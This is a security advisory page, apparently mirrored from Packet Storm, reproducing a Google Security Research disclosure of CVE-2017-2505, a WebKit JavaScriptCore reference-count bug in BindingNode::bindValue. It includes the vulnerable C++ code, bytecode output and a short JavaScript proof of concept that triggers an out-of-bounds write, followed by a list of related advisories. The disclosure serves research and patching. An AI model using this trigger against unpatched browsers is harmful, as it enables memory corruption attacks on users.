Lucene search
Google Security ResearchPACKETSTORM:142664HistoryMay 25, 2017 - 12:00 a.m.
WebKit JSC BindingNode::bindValue Failed Reference Count Increase
2017-05-2500:00:00
Google Security Research
packetstormsecurity.com
18
0.007 Low
EPSS
Percentile
77.3%
` WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count
CVE-2017-2505
Here's a snippet of BindingNode::bindValue.
void BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const
{
...
RegisterID* scope = generator.emitResolveScope(nullptr, var);
generator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd());
if (m_bindingContext == AssignmentContext::AssignmentExpression)
generator.emitTDZCheckIfNecessary(var, nullptr, scope);
if (isReadOnly) {
generator.emitReadOnlyExceptionIfNeeded(var);
return;
}
generator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext));
generator.emitProfileType(value, var, divotStart(), divotEnd());
if (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement)
generator.liftTDZCheckIfPossible(var);
...
}
That method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used.
Generated opcode of the PoC:
[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0
[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None
[ 139] op_check_tdz loc13
[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0
At 131, loc13 which points the scope is overwritten with |a|.
At 141, |a| is used as a scope, and it causes OOB write.
PoC:
(function () {
let a = {
get val() {
[...{a = 1.45}] = [];
a.val.x;
},
};
a.val;
})();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Related
ubuntucve
ubuntucve
CVE-2017-2505
2017-05-22 00:00:00
debiancve
debiancve
CVE-2017-2505
2017-05-22 05:29:00
checkpoint_advisories
checkpoint_advisories
Apple Webkit Remote Code Execution (CVE-2017-2505)
2020-02-27 00:00:00
seebug
seebug
prion
prion
Memory corruption
2017-05-22 05:29:00
cve
cve
CVE-2017-2505
2017-05-22 05:29:00
myhack58
myhack58
googleprojectzero
googleprojectzero
JSC Exploits
2019-08-29 00:00:00
nessus
nessus
Apple TV < 10.2.1 Multiple Vulnerabilities
2017-05-17 00:00:00
macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities
2017-05-23 00:00:00
Apple iOS < 10.3.2 Multiple Vulnerabilities
2017-05-18 00:00:00
openvas
openvas
Apple Safari Multiple Vulnerabilities (HT207804)
2017-05-16 00:00:00
apple
apple
About the security content of Safari 10.1.1
2017-05-15 00:00:00
About the security content of Safari 10.1.1 - Apple Support
2017-06-26 04:38:16
About the security content of tvOS 10.2.1 - Apple Support
2017-06-21 08:52:03
gentoo
gentoo
WebKitGTK+: Multiple vulnerabilities
2017-06-07 00:00:00